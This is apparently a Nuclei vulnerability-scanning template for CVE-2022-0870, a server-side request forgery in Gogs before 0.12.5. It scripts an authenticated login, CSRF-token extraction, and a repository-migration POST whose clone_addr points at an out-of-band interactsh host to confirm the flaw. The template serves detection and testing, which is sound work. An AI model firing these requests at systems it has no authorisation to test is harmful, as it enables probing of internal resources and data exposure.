79 lines
2.5 KiB
YAML
79 lines
2.5 KiB
YAML
id: CVE-2022-0870
|
|
|
|
info:
|
|
name: Gogs <0.12.5 - Server-Side Request Forgery
|
|
author: theamanrawat,Akincibor
|
|
severity: medium
|
|
description: |
|
|
Gogs GitHub repository before 0.12.5 is susceptible to server-side request forgery. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
|
impact: |
|
|
Successful exploitation of this vulnerability can result in unauthorized access to sensitive internal resources.
|
|
remediation: Fixed in version 0.12.5.
|
|
reference:
|
|
- https://github.com/gogs/gogs/commit/91f2cde5e95f146bfe4765e837e7282df6c7cabb
|
|
- https://huntr.dev/bounties/327797d7-ae41-498f-9bff-cc0bf98cf531
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-0870
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2022-0870
|
|
cwe-id: CWE-918
|
|
epss-score: 0.00197
|
|
epss-percentile: 0.57411
|
|
cpe: cpe:2.3:a:gogs:gogs:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 4
|
|
vendor: gogs
|
|
product: gogs
|
|
tags: cve,cve2022,ssrf,gogs,authenticated,huntr
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /user/login HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- |
|
|
POST /user/login HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}
|
|
- |
|
|
GET /repo/migrate HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- |
|
|
POST /repo/migrate HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
_csrf={{auth_csrf}}&clone_addr=https%3A%2F%2F{{interactsh-url}}&auth_username=&auth_password=&uid=1&repo_name={{randstr}}&description=test
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "dns"
|
|
- "http"
|
|
|
|
- type: word
|
|
part: body_1
|
|
words:
|
|
- 'content="Gogs'
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: csrf
|
|
group: 1
|
|
regex:
|
|
- 'name="_csrf" value="(.*)"'
|
|
internal: true
|
|
|
|
- type: regex
|
|
name: auth_csrf
|
|
group: 1
|
|
regex:
|
|
- 'name="_csrf" content="(.*)"'
|
|
internal: true
|
|
# digest: 4a0a0047304502201d0544550f4fe54d8dbf941d6010684583ce4cc57d5f495ae9d2537b001fc485022100d3c99b64f4d6bffae9de65a8610a90d61c0c8a278a408606de91a54ef55b06ef:922c64590222798bb761d5b6d8e72950 |